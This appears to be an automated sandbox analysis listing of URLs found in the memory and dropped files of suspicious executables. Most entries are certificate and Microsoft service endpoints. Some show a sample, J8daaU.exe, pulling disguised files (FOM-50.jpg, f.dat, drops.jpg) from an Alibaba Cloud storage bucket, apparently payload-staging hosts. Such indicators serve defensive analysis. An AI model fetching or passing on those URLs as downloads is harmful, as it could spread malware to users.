Source: Gokod.763652.06.exe, aceprocted.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Gokod.763652.06.exe, aceprocted.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Gokod.763652.06.exe	String found in binary or memory: http://crossref.org/crossmark/1.0/
Source: Gokod.763652.06.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Gokod.763652.06.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Gokod.763652.06.exe, J8daaU.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Gokod.763652.06.exe	String found in binary or memory: http://dx.doi.org/10.1016/j.comcom.2011.09.008
Source: Gokod.763652.06.exe	String found in binary or memory: http://dx.doi.org/10.1016/j.comcom.2011.09.008)/S/URI
Source: svchost.exe, 00000001.00000003.1208743106.000001F385618000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000001.00000003.1208743106.000001F385618000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000001.00000003.1208743106.000001F385618000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000001.00000003.1208743106.000001F38564D000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.1.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Gokod.763652.06.exe	String found in binary or memory: http://jbotsim.sf.net/examples/bico.html)/S/URI
Source: Gokod.763652.06.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Gokod.763652.06.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Gokod.763652.06.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: Gokod.763652.06.exe, aceprocted.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: Gokod.763652.06.exe	String found in binary or memory: http://ocsp.digicert.com0N
Source: Gokod.763652.06.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Gokod.763652.06.exe, J8daaU.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Gokod.763652.06.exe	String found in binary or memory: http://prismstandard.org/namespaces/basic/2.0/
Source: Gokod.763652.06.exe	String found in binary or memory: http://prismstandard.org/namespaces/prismusagerights/2.1/
Source: Gokod.763652.06.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Gokod.763652.06.exe	String found in binary or memory: http://s.symcd.com06
Source: Gokod.763652.06.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Gokod.763652.06.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: aceprocted.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Gokod.763652.06.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Gokod.763652.06.exe, Amcache.hve.54.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 00000002.00000002.1395519765.000002336DE13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Gokod.763652.06.exe, aceprocted.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Gokod.763652.06.exe	String found in binary or memory: http://www.elsevier.com/locate/comcom)/S/URI
Source: Gokod.763652.06.exe	String found in binary or memory: http://www.extensis.com/meta/FontSense/
Source: Gokod.763652.06.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: Gokod.763652.06.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Gokod.763652.06.exe	String found in binary or memory: http://www.sciencedirect.com/science/journal/01403664)/S/URI
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: Gokod.763652.06.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: Gokod.763652.06.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: Gokod.763652.06.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395625269.000002336DE59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000002.00000003.1379724150.000002336DE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380482497.000002336DE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395720938.000002336DE81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000002.00000002.1395720938.000002336DE81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380482497.000002336DE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: Gokod.763652.06.exe	String found in binary or memory: https://dl.google.com/release2/chrome/il4ofyksvfhyikxnl76bap4pmu_116.0.5845.111/116.0.5845.111_chrom
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/3/7/D3726-de.pdf)
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/5/4/B5488-de.pdf)
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/5/4/D54881-de.pdf)
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/7/0/D7000E1-de.pdf)
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/7/0/D7000TUV-de.pdf)
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/7/7/D7710MV-de.pdf)
Source: Gokod.763652.06.exe	String found in binary or memory: https://downloads.hawe.com/7/7/D7710TUEV-de.pdf)
Source: svchost.exe, 00000002.00000003.1384651314.000002336DE32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000002.00000003.1379724150.000002336DE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000001.00000003.1208743106.000001F3856C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000001.00000003.1208743106.000001F3856C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/.a(
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/.o
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002E
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/2
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/7
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgJv
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgbu
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpges
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgstory
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg?
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpges
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgetCache
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgu.aliyuncs.com/
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/Windows
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/al
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735E9000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B8735E8000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/drops.jpg
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/e
Source: J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/f.dat
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B8735E9000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B8735E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/f.dat3
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B8735E9000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B8735E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/f.datjpgW_
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/fo
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/Windows
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/om
Source: J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/qt
Source: J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nm25.oss-cn-hangzhou.aliyuncs.com/v
Source: svchost.exe, 00000001.00000003.1208743106.000001F3856C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.1.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Gokod.763652.06.exe, J8daaU.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
